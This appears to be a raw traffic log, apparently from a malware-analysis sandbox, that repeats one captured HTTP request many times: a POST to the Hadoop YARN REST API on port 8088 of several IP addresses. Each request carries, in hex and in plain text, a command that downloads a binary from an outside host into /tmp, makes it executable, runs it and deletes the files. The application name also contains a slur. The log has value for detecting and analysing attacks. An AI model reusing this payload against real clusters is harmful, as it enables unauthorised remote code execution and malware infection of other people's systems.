{"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 81.209.218.53:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 197.159.201.249:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 197.159.201.249:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 197.159.201.249:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 192.126.40.239:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 192.126.40.239:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 192.126.40.239:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 142.172.118.111:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 